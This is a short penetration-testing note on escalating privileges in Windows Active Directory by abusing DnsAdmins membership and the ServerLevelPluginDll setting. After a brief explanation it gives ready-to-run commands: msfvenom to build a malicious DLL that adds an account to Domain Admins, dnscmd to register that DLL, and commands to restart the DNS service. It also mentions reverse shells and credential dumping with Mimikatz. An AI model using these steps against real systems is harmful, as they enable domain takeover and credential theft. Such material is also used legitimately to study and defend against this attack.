• DNS management is performed over RPC
• ServerLevelPluginDll allows us to load a custom DLL with zero verification of the DLL's path. This can be done with the dnscmd tool from the command line
• When a member of the DnsAdmins group runs the dnscmd command below, the HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters\\ServerLevelPluginDll registry key is populated
• When the DNS service is restarted, the DLL in this path will be loaded (i.e., a network share that the Domain Controller's machine account can access)
• An attacker can load a custom DLL to obtain a reverse shell or even load a tool such as Mimikatz as a DLL to dump credentials.

See: https://adsecurity.org/?p=4064

Generating malicious DLL:

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

Then upload the DLL.

Configuring the custom DLL:

dnscmd.exe /config /serverlevelplugindll C:\\Users\\netadm\\Desktop\\adduser.dll

The DLL will be loaded at next DNS service restart:

sc stop dns
sc start
sc query dns

wmic useraccount where name="netadm" get sid